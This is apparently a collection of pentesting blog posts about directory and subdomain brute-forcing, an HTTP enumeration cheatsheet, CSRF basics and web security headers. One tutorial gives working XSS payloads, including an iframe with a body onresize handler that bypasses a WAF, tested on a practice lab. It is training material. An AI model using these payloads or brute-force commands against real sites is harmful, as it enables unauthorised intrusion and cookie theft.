Tips & Tricks

Dealing w/ Gobuster “WildCard” and “Status Code” Errors

Have you ever encountered the following error within Gobuster?

Error: the server returns a status code that matches the provided options for non existing urls. http://ipaddress/9b9353c0-3de2-4df5-abd7-0f618e4d70ab => 200. To force processing of Wildcard responses, specify the ‘–wildcard’ switch

Likely, the webserver you’re attacking is configured to always respond with a 200 response code. For example, let’s look at BART on Hack The Box.

Let’s see if we can extract anything with Curl. We’ll start by sending a request out to the default page. We see that it returns a 302 redirect to forum.bart.htb.

curl -vvv 10.10.10.81

Let’s try a request to a page we know doesn’t exist, and we are returned a success 200 message that displays an image. This explains why Gobuster was returning a 200 message on each directory.

We can confirm this by browsing to the page and looking at the image.

Armed with this information, we know that 200 response codes are bad, but other response codes (such as a 302) indicate a directory is present. Let’s rerun our Gobuster command, but we’ll specify which response codes we want returned.

Checking the help page, we can see that Gobuster accepts the following response codes; “200,204,301,302,307,401,403”.

So our command will look like this.

gobuster dir -u http://10.10.10.81 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403"

And with that command running, we eventually start to get some real results back.

Hacking Tutorial

Bruteforcing Subdomains w/ WFuzz

This guide is going to use CMess from TryHack.me as an example, but does not intend to serve as a walkthrough or write-up of the machine.


Before we begin, make sure you can resolve the domain name that we’re targeting. If you’re doing this in a CTF-type environment, you may need to update your /etc/hosts file with the hostname/address of the target.

We can use a tool called wfuzz to bruteforce a list of subdomains, but first, we’ll need a list to use.

I like to use the top 5000 list from Seclists, which can be found at https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt

With our list in hand, let’s set up our command using the sub-fighter mode.

sudo wfuzz -c -f sub-fighter.txt -Z -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --sc 200,202,204,301,302,307,403 <targetURL>

Now you may get a ton of output that shows valid subdomains depending on how the site is configured. If you notice a large amount of results that contain the same word count, this may just be an indication that the site returns a 200 response, but it just displays a “Not found” error.

To remove results with a specific word count, you can append your command w/ --hw <value>. For example, our new command that removes results that respond w/ a word count of 290 would look like the following:

wfuzz -c -f sub-fighter -w top5000.txt -u 'http://target.tld' -H "Host: FUZZ.target.tld" --hw 290

This will return a list of subdomains that do not contain a word count of 290. If you get a successful result, make sure you’re able to resolve the subdomain as well before trying to browse to it. If you’re in a CTF-type environment, you may need to update your /etc/hosts file.

With our /etc/hosts file updated, we should be able to browse to the page.

Hacking Tutorial, Pentesting, WebApp 101

Bypassing XSS Defenses Part 1: Finding Allowed Tags and Attributes

This post intends to serve as a guide for a common bypass technique when you’re up against a web application firewall (WAF). In the event that the WAF limits what tags and attributes are allowed to be passed, we can use BurpSuite’s Intruder functionality to learn which tags are allowed.

Table of Contents:

  • Setting the stage.
  • Identifying which tags are allowed.
  • Identifying which events are allowed.
  • Putting the pieces together.

Setting the stage.

In our example, we have a webapp with a vulnerable search field. To begin testing, we start out with a simple XSS payload that will display the session cookie of the user when it fails to load a bad image path.

<img src=1 onerror=alert(document.cookie)>

However, the webserver responds with an error stating we’re using a tag that isn’t allowed.


Identifying which tags are allowed.

If we’re going to exploit this webapp, we need to first find out what tags are allowed in the search field. To do this, we can leverage BurpSuite’s Intruder functionality to brute force the page with every possible JavaScript tag and see which one(s) respond with a success message.

Let’s spin up BurpSuite and capture a web request with a generic search term.

With our request captured, let’s send this off to Intruder.

To begin, lets Clear the default payload positions BurpSuite selected for us.

Now we will replace the search term with <> to open/close the script tags that we wish to send to the application. Place the cursor between the angle brackets and click Add § twice, to create a payload position. The value of the search term should now look like: <§§>

Now that we have the position set, we need to provide our list of payloads. Head over to PortSwigger’s XSS cheat sheet and click Copy tags to clipboard.

With a list of all tags copied to your clipboard, head back to Intruder and select the Payload tab. Then click Paste.

Everything should now be in place! Let’s click Start Attack and allow time for all of the requests to be made.

Once the attack finishes, we see that the Body tag returns a status code of 200. This indicates that the WAF allows this tag and perhaps we can use it for our exploitation process.


Identifying which events are allowed.

Now that we know we can use the body tag, we need to know which events we can use. We’ll repeat the same process we used above, but this time, we’ll Copy events to clipboard from the PortSwigger’s XSS cheat sheet.

Heading back to Intruder, we’ll start by adjusting our list of Payloads. Click Clear to remove the existing list.

Now we can Paste our list of events.

Let’s head over to the Positions tab and adjust our search term to <body%20=1>. Place your cursor before the equal sign and then click Add § twice to create the payload position. The value of the search term should now look like: <body%20§§=1>

This will cause BurpSuite to send requests to the search field that look like

/?search=<body onactivate=1>
/?search=<body onafterprint=1>
/?search=<body onafterscriptexecute=1>

I’m happy with that. We’ll Start Attack.

Observe the results, and notice that the only payload returning a 200 response is onresize.


Putting the pieces together.

So what do we know? Well, we know that we can use the body tag along with the onresize element. Armed with this knowledge, what would happen if we were to inject JavaScript code that displayed the users session cookie when the window is resized? Could we craft something that automatically resizes the window to trigger this for us?

As an attacker, lets spin up a malicious webpage that includes a reference to the vulnerable webapp within an iframe.

<iframe src="https://your-lab-id.web-security-academy.net/?search="><body onresize=alert(document.cookie)>" onload=this.style.width='100px'>

Let’s break down what we’re doing.

  1. We begin by inserting an iframe to our webpage that will display content from the vulnerable webapp.
  2. We then inject a search query that will generate an alert containing the victim’s session cookie when the element onresize is called within the body tag.
  3. We then force the iframe to resize itself to a width of 100px upon loading.
  4. When the victim browses to our malicious website, this iframe will be loaded in their browser, resized, and then the session cookie will be displayed back to them.

Now this is really just useful as a proof of concept, because this particular example doesn’t provide the attacker with the session cookie. The finished product would look something like this after including HTML encoding.

<iframe src="https://your-lab-id.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E"onload=this.style.width='100px'>


The primary goal for this post was to showcase BurpSuite Intruder’s ability to bruteforce a webserver and identify the attack surface. I hope you found it useful!

Enumeration Cheatsheets

Enumerating HTTP Ports (80, 443, 8080, etc.)


When enumerating, we want to be able to identify the software/versions that are fulfilling the following roles. This document intends to serve as a guide for hunting for the answers.

  • Web Application – WordPress, CMS, Drupal, etc.
  • Web Technologies – Node.js, PHP, Java, etc.
  • Web Server – Apache, IIS, Nginx, etc.
  • Database – MySQL, MariaDB, PostgreSQL, etc.
  • OS – Ubuntu Linux, Windows Server, etc.

Using Curl

Pulling out internal/external links from source code.
curl <address> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

To view just HTTP Links:
curl -s <address> | grep -Eo '(href|src)=".*"' | sed -r 's/(href|src)=//g' | tr -d '"' | sort

Strip out the HTML code from source-code of webpage.
curl <address> -s -L | html2text -width '99' | uniq

Check for contents of robots.txt.
curl <address>/robots.txt -s | html2text


Using Nikto

To perform a scan.
sudo nikto -host=http://<address>/


Using Gobuster

First, lets start with an initial scan on the address using a default wordlist. We’ll have it return results for most response codes.

For invalid HTTPS certificates, you can include -k to any of these commands to bypass cert checks.

gobuster dir -u http://<address>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -x txt,php,html

After common finishes, I like to use the following to dig deeper.

gobuster dir -u http://<address>/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -s '200,204,301,302,307,403,500' -e -x txt,html,php,asp

We can also leverage the following wordlist to look for CGI URLs.

gobuster dir -u http://<address>/ -w /usr/share/dirb/wordlists/vulns/cgis.txt -s '200,204,301,302,307,403,500' -e

Note: If you start getting spammed with a particular response code, you can remove that from the -s flag.

If you find a cgi-bin directory, you may want to consider scanning it for .sh files. If one is found, see if you the machine is vulnerable to shellshock. There is an nmap script that can identify the vulnerability, but it isn’t always reliable. May be beneficial to run it through a tool like Burp to look at the requests.


Using Dirsearch

This is a tool you can get from Github. It provides much of the same functionality as Gobuster.

The following syntax will run the tool to enumerate php and html files. It will exclude responses w/ code 400, 401, and 403.

python3 dirsearch.py -u http://url.tld -e php,html -x 400,401,403


Using WFuzz

Subdomain Enumeration. Check out the post I made on this topic over at https://infinitelogins.com/2020/09/02/bruteforcing-subdomains-wfuzz/

Valid User Enumeration. Check out the post I made on this topic over at https://infinitelogins.com/2020/09/07/bruteforcing-usernames-w-wfuzz/

Enumerating valid parameters in URLs. You can run the following command to try and brute-force valid parameter names.
wfuzz -u http://<address>/?FUZZ=index -w /usr/share/seclists/Discovery/Web-Content/common.txt


Enumeration Checklist

Once you feel you’ve enumerated everything, just check your work against this list to make sure you’re not missing anything.

  • Did you brute force directories?
    • Did your brute force search recursively?
    • Did your brute force include file extensions?
    • Is your brute force case-sensitive?

  • Did you enumerate the hostname of the box and updated your /etc/hosts file to include it?
    • Did you enumerate subdomains?
    • Did you brute force directories when browsing to it via hostname?

  • Did you review every webpage on the box for clues?
    • Did you review the source code?
    • Are there usernames hidden anywhere?
    • Are there specific version details provided?

  • Did you check for vulnerable technologies?
    • If you’re able to enumerate version information, did you searchsploit and/or research for public exploits?
    • What about for PHP or ASP?
    • What about for WordPress or Drupal?
    • What about for Apache or IIS?
    • Can you use a specific tool like WPSCAN to enumerate further?

  • Did you find a login page?
    • Can you enumerate multiple users on it?
    • Can you brute-force it?
    • Can you perform an injection attack (SQL, XSS, etc.)?
  • If there is HTTPS on the page, did you check the certificate for details?
    • Does the cert contain specific email addresses?
    • Does the cert contain information about a hostname of the box?
    • Is the cert valid on other domain-names?

  • Are there other ports running HTTP or HTTPS that you need to repeat all of this on?
General Blog

Let’s Talk Basics About Cross Site Request Forgery (CSRF)

It became apparent to me that my understanding of CSRF was lacking, or uh, basically non-existent. This post aims to fix that! Come learn about it along with me.

Note: This particular post is NOT a hacking tutorial on abusing CSRF, though I’m sure I will post one in the near future (make sure to subscribe or hit up my Twitter feed so you’ll know when that comes out).


What is Cross Site Request Forgery?

Well we know that it is consistently in the OWASP Top 10 for web application vulnerabilities, but what does it actually do?

CSRF is when another website is able to make a request, as a victim user, to the target website. What does that mean? Well, it means that an attacker may trick the users of a web application into performing unwanted tasks, such as transferring funds, changing their email address, deleting their account, posting a comment, etc.

Let’s say there is a web application running on vulnerable.com (please don’t try to actually visit this site, I have no idea what is there and whether or not its a valid webpage). In our fake scenario, vulnerable.com hosts a simple web application where you can create an account and post a comment on a text board. There is also a page for you to be able to delete your account. Normally, if an end-user wanted to actually delete their account, they would browse to this page, click the confirmation button, and then a request would be made to the webserver that looks something like this:

POST /delete_my_account HTTP/1.1
Host: vulnerable.com
Content-Type: application/x-www-form-urlencoded
Cookie: SessionID=d42be1j5

delete = 1

The key items to note about this is that there is a POST request to vulnerable.com/delete_my_account for a specific SessionID. Now in a perfect world, the only person who would initate this request would be the actual end-user behind that SessionID, but what if us — evil hackers — wanted to delete the account for them without their consent?

This is where CSRF comes in. Let’s, as attackers, spin up a malicious webpage at evil.com (same disclaimer as before) and add code so that we initiate that same request mentioned above once a user accesses our webpage. If vulnerable.com doesn’t have protections in place, we could leverage CSRF to send the same POST request and delete user accounts on a completely separate website without the users consent.


So how do we mitigate this?

There are a number of mitigation techniques.

Add a hash (session id, function name, service-side secret) to all forms.
This method involves including a random, unique identifier to webforms when a user accesses the page. The idea behind this technique is that attack webservers will not possibly be able to know what unique identifier is being used for the victim user on the target website. This means that even if they attempt a CSRF attack, the target website will notice that the unique identifier is missing and reject the POST request.

Checking the Referrer header in the client’s HTTP request.
When a web request is submitted, there is typically a referrer header added that specifies where that web request originated. Ensuring that the request has come from the original site means that attacks from other sites will not function.

Note: This method may not always be reliable for web-developers if the user utilizes ad-blocker or additional privacy protection methods, as the referrer header on a valid web request may indicate the request came from one of these third parties.

Signing off of webpages when not in use.
While CSRF is really a problem with the web application, and not the end user utilizing the webpage, users can protect themselves by signing out or killing any active sessions for their sensitive webapps BEFORE browsing the web or accessing a different page.

General Blog

Have a WebApp? Here Are Three HTTP Headers Leaking Your Server Information

This post intends to discuss the three most common HTTP headers that leak server information. While these headers don’t do anything to help protect against attacks, they can be used by attackers to enumerate the underlying technologies behind the application during the early enumeration phase of an attack.

If you’d like to learn more about HTTP headers that can help mitigate a range of attack vectors, check out my previous post What are Web Application HTTP Security Headers? When do you use them?


SERVER

What does this header do?
This header contains information about the software used by the back-end server (type and version).

EXAMPLE:

We’re able to identify that this webserver is running IIS 8.5 based on the Server header.


X-POWERED-BY

What does this header do?
It contains the details of the web framework or programming language used in the web application. 

EXAMPLE:

We’re able to identify example what PHP version is being used on this webserver by it’s X-Powered-By header.


X-ASPNET-VERSION

What does this header do?
As the name suggests, it shows the version details of the ASP .NET framework. This information may help an adversary to fine-tune its attack based on the framework and its version.

EXAMPLE:

We’re able to identify exactly what ASP .NET version is running on this webserver based on the X-AspNet-Version header.


Why do we care? What can do we do about it?

Why is this dangerous?
Because these headers can leak software information, this allows an attacker to know what exact web technologies are in place and what their associated version(s) are. Armed with this information, they can then hunt for public known exploits on those versions.

What is your recommendation?
The server information can be masked by re-configuring the webserver to read something other than the actual server technologies in place.

General Blog

What are Web Application HTTP Security Headers? When do you use them?

This post intends to serve as a guide for some of the most common HTTP Headers web applications use to prevent exploitation of potential vulnerabilities. Within this article, you will discover the name of the various headers, along with their use case and various configuration options.

If you’d like to learn more about which headers may be leaking information about the software running on your webserver, check out my other post titled Have a WebApp? Here Are Three HTTP Headers Leaking Your Server Information.

Table of Contents:

  • Strict-Transport-Security
  • Content-Security-Policy
  • Access-Control-Allow-Origin
  • Set-Cookie
  • X-Frame-Options
  • X-XSS-Protection
  • Additional Resources

STRICT-TRANSPORT-SECURITY

What does this header do?
HTTP Strict Transport Security instructs the browser to access the webserver over HTTPS only.

Why would we use this?
By enforcing the use of HTTPS, we’re ensuring that users accessing the web page has a secure, encrypted connection. This can also help users notice whether or not they are victim to man in the middle attacks if they receive certificate errors when a valid certificate is in place on the webpage.

What values can we set this header to?
There are 3 directives for this header:

  • Max-Age : Default value of 31536000. This is the maximum age (time) for which the header is valid. The server updates this time with every new response to prevent it from expiring.
  • IncludeSubDomains : This applies control over subdomains of the website as well.
  • Preload : This is a list that is maintained by Google. Websites on this list will automatically have HTTP enforced in the Google Chrome browser.

CONTENT-SECURITY-POLICY

What does this header do?
Content Security Policy is used to instruct the browser to load only the allowed content defined in the policy. This uses a whitelisting approach which tells the browser from where to load the images, scripts, CSS, applets, etc.

Why would we use this?
If implemented properly, we would be able to prevent exploitation of Cross-Site Scripting (XSS), Clickjacking, and HTML Injection attacks. We do this by carefully specifying where content can be loaded from, which hopefully isn’t a location that attackers have control of.

What values can we set this header to?
The values can be defined with the following directives:

  • default-src
  • script-src
  • media-src
  • img-src
EXAMPLE:

Content-Security-Policy: default-src 'self'; script-src runscript.com; media-src online123.com online321.com; img-src *;

This is would be interpreted by the browser as:

  • default-src 'self' : Load everything from the current domain.
  • script-src runscript.com : Scripts can only be loaded from runscript.com
  • media-src online123.com online321.com : Media can only be loaded from online123.com and online321.com.
  • img-src * : Images can be loaded from anywhere.

ACCESS-CONTROL-ALLOW-ORIGIN

What does this header do?
This header indicates whether the response can be shared with requesting code from the given origin.

Why would we use this?
This is used to take a whitelisting approach on which third parties are allowed to access a given resource. For example, if site ABC wants to access a resource on site XYZ (and is allowed to), XYZ will respond with a Access-Control-Allow-Origin header with the address of site ABC to instruct the browser that this is allowed.

What values can we set this header to?
The following directives can be used:

  • * : For requests without credentials, you can specify a wildcard to tell browsers to allow requesting code from any origin to access the resource.
  • <origin> : Specifics a single origin.
  • null : This should not be used.

SET-COOKIE

What does this header do?
This response header is used to send cookies from the server to the user agent, so the user agent can send them back to the server later. One important use of cookies is to track a user session, and can oftentimes contain sensitive information. Because of this, there are additional attributes that we can set for securing the cookies.

Why would we use the additional attributes?
Using these additional attributes can help protect the cookies against unauthorized access.

What values can we apply?
While there are many attributes for a cookie, the following are most important from a security perspective.

  • Secure : A cookie set with this attribute will only be sent over HTTPS and not over the clear-text HTTP protocol (which is susceptible to eavesdropping).
  • HTTPOnly : The browser will not permit JavaScript code to access the contents of the cookies set with this attribute. This helps in mitigating session hijacking through

X-FRAME-OPTIONS

What does this header do?
This header can be used to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe> or <object>.

Why would we use this?
Use this to avoid clickjacking attacks. Without clickjacking protections, an adversary could trick a user to access a malicious website which will load the target application into an invisible iframe. When the user clicks on the malicious application (ex. a web-based game), the clicks will be ‘stolen’ and sent to the target application (Clickjacking). As a result, the user will click on the legitimate application without his consent, which could result in performing some unwanted actions (ex. delete an account, etc).

What values can we set this header to?
There are 3 directives we can use:

  • deny : This will not allow the page to be loaded in a frame on any website.
  • same-origin : This will allow the page to be loaded in a frame only if the origin frame is same.
  • allow-from uri : The frame can only be displayed in a frame on the specified domain/origin.

X-XSS-PROTECTION

What does this header do?
This header enables the Cross-site scripting (XSS) filter built into most recent web browsers.

Why would we use this?
The sole purpose is to protect against Cross-Site Scripting (XSS) attacks.

What values can we set this header to?
There are 3-modes that we can set this header to:

  • 0; : Disables the XSS filter.
  • 1; : Enables the filter. If an attack is detected, the browser will sanitize the content of the page in order to block the script execution.
  • 1; mode=block : Will prevent the rendering of the page if an XSS attack is detected.

Additional Resources

This is nowhere near an exhaustive list of the different security headers that you should be using. Should you like to learn more or dive into this topic deeper, I’d recommend checking out the following websites:

Essential HTTP Headers for Securing Your Web Server

Mozilla’s HTTP Headers Documentation